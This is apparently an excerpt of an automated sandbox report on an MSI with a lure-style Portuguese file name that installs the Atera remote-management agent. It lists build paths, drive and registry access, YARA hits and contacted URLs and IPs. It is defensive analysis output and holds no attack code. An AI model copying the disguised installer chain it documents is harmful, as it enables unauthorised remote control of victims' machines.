                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\net6.0-Release\System.Runtime.Serialization.Json.pdbT*n* `*_CorDllMainmscoree.dll source: System.Runtime.Serialization.Json.dll.2.dr
                                Source: Binary string: D:\a\CliWrap\CliWrap\CliWrap.Signaler\obj\Release\net35\CliWrap.Signaler.pdb source: CliWrap.dll.26.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentCommunication.Models\obj\Release\net45\Atera.AgentCommunication.Models.pdb source: AgentPackageInternalPoller.exe, 00000037.00000002.2102333146.000001CC12CE2000.00000002.00000001.01000000.00000030.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: api-ms-win-core-processthreads-l1-1-1.dll.2.dr
                                Source: Binary string: D:\a\41\s\AteraNugetPackages\Atera.AgentPackages.CommonLib\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb source: AgentPackageMarketplace.exe, 0000003A.00000002.2115830756.0000016597FE2000.00000002.00000001.01000000.00000031.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256^Y source: AgentPackageMarketplace.exe, 0000003A.00000002.2141429257.00000165B0B22000.00000002.00000001.01000000.00000039.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\AgentPackageTicketing\obj\Release\AgentPackageTicketing.pdb source: AgentPackageTicketing.exe, 00000033.00000000.1978260272.0000024844C32000.00000002.00000001.01000000.0000002A.sdmp
                                Source: C:\Windows\System32\msiexec.exe File opened: z:
                                Source: C:\Windows\System32\msiexec.exe File opened: x:
                                Source: C:\Windows\System32\msiexec.exe File opened: v:
                                Source: C:\Windows\System32\msiexec.exe File opened: t:
                                Source: C:\Windows\System32\msiexec.exe File opened: r:
                                Source: C:\Windows\System32\msiexec.exe File opened: p:
                                Source: C:\Windows\System32\msiexec.exe File opened: n:
                                Source: C:\Windows\System32\msiexec.exe File opened: l:
                                Source: C:\Windows\System32\msiexec.exe File opened: j:
                                Source: C:\Windows\System32\msiexec.exe File opened: h:
                                Source: C:\Windows\System32\msiexec.exe File opened: f:
                                Source: C:\Windows\System32\msiexec.exe File opened: b:
                                Source: C:\Windows\System32\msiexec.exe File opened: y:
                                Source: C:\Windows\System32\msiexec.exe File opened: w:
                                Source: C:\Windows\System32\msiexec.exe File opened: u:
                                Source: C:\Windows\System32\msiexec.exe File opened: s:
                                Source: C:\Windows\System32\msiexec.exe File opened: q:
                                Source: C:\Windows\System32\msiexec.exe File opened: o:
                                Source: C:\Windows\System32\msiexec.exe File opened: m:
                                Source: C:\Windows\System32\msiexec.exe File opened: k:
                                Source: C:\Windows\System32\msiexec.exe File opened: i:
                                Source: C:\Windows\System32\msiexec.exe File opened: g:
                                Source: C:\Windows\System32\msiexec.exe File opened: e:
                                Source: C:\Windows\System32\cscript.exe File opened: c:
                                Source: C:\Windows\System32\msiexec.exe File opened: a:
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-CheckSumValid.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Format-FileSize.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariableNames.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariable.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyUnzip.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyWebFile.ps1

                                Networking

                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.119.152.241 443
                                Source: Yara matchFile source: 20.0.AgentPackageAgentInformation.exe.1fd40e70000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 51.2.AgentPackageTicketing.exe.24845080000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 53.2.AgentPackageProgramManagement.exe.213b3f70000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\netstandard.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll, type: DROPPED
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENT.PACKAGE.WATCHDOG/1.5/AGENT.PACKAGE.WATCHDOG.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEADREMOTE/6.0/AGENTPACKAGEADREMOTE.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEHEARTBEAT/17.14/AGENTPACKAGEHEARTBEAT.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEMARKETPLACE/1.6/AGENTPACKAGEMARKETPLACE.ZIP
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234005EC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400239000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEMONITORING/36.9/AGENTPACKAGEMONITORING.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEOSUPDATES/19.9/AGENTPACKAGEOSUPDATES.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGERUNTIMEINSTALLER/1.6/AGENTPACKAGERUNTIMEINSTALLE
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGESTREMOTE/23.4/AGENTPACKAGESTREMOTE.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGESYSTEMTOOLS/26.8/AGENTPACKAGESYSTEMTOOLS.ZIP
                                Source: AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a6dc35606b2c6816e.awsglobalaccelerator.com
                                Source: AteraAgent.exe, 0000000E.00000000.1397150472.000001E726672000.00000002.00000001.01000000.00000010.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400001000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acontrol.atera.com/
                                Source: rundll32.exe, 00000006.00000002.1359772261.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400341000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400339000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006B0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005265000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582681527.000001FD41A9F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000016.00000002.1582648644.0000026AD24DF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F0F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB83F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB8C1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB867000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB82C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0F61000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E43400F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B6D7000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 
00000037.00000002.2103371672.000001CC12E49000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2116373812.0000016598452000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2116373812.00000165984EE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.0000013262A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://agent-api.atera.com
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://agent-api.atera.comPG
                                Source: AgentPackageTicketing.exe, 00000033.00000002.2571688057.00000248459E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.nuget.org
                                Source: rundll32.exe, 00000006.00000002.1359772261.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400339000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006B0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005265000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582681527.000001FD41A9F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000016.00000002.1582648644.0000026AD24DF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F0F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB83F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB8C1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB867000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0F61000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E43400F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B6D7000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2103371672.000001CC12E49000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2116373812.0000016598452000.00000004.00000800.00020000.00000000.sdmp, 
AgentPackageMarketplace.exe, 0000003A.00000002.2116373812.00000165984EE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.0000013262A04000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132628E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://atera-agent-api-eu.westeurope.cloudapp.azure.com
                                Source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B0013B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blob.ams08prdstr06a.store.core.windows.net
                                Source: AteraAgent.exe, 00000010.00000002.1922183275.0000023477BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cabb2p:
                                Source: AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d17kmd0va0f0mp.cloudfront.net
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A8822B8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d25btwd9wax8gu.cloudfront.net
                                Source: AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1557171190.000001FD40E72000.00000002.00000001.01000000.00000018.sdmp, AgentPackageAgentInformation.exe.16.drString found in binary or memory: http://dl.google.com/googletalk/googletalk-setup.exe
                                Source: AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.splashtop.com
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://download.sysinternals.com/Files/SysinternalsSuite.zip
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://download.sysinternals.com/Files/SysinternalsSuitex64.zip
                                Source: AgentPackageMarketplace.exe, 0000003A.00000002.2141429257.00000165B0B22000.00000002.00000001.01000000.00000039.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://learn-powershell.net/2013/02/08/powershell-and-events-object-events/
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2265471511.00000213B38B2000.00000002.00000001.01000000.0000003F.sdmpString found in binary or memory: http://logging.apache.org/log4net/release/faq.html#trouble-EventLog
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B343000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://mirrors.kernel.org/sourceware/cygwin/
                                Source: AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://my.splashtop.com
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://nlog-project.org/dummynamespace/
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://nlog-project.org/ws/
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://nlog-project.org/ws/3
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://nlog-project.org/ws/5
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://nlog-project.org/ws/ILogReceiverOneWayServer/ProcessLogMessages
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesResponsep
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesT
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmpString found in binary or memory: http://nlog-project.org/ws/T
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B3F72000.00000002.00000001.01000000.00000041.sdmpString found in binary or memory: http://nsis.sourceforge.net/Docs/AppendixD.html
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digice
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEsd=
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740BE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rh
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1449086185.000001E740BE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1450070040.000001E741015000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1450070040.000001E740FDF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340062A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1920033330.0000023477585000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234007B2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340032E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400618000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881E77000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 
0000001A.00000002.2376340769.000001A89A2D1000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A8822AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BCC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924832428.0000023477CF4000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C19000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BC0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1585649904.000001FD5A0C8000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000016.00000002.1583936197.0000026AEAC45000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2376340769.000001A89A200000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 
0000001A.00000002.2398266422.000001A89A65A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1920033330.0000023477585000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F3D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A65A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, Pubnub.dll0.2.dr, System.Threading.Tasks.dll.26.dr, Atera.AgentPackages.CommonLib.dll2.26.dr, System.Dynamic.Runtime.dll.26.dr, System.ValueTuple.dll.16.drString found in binary or memory: http://ocsp.digicert.com0C
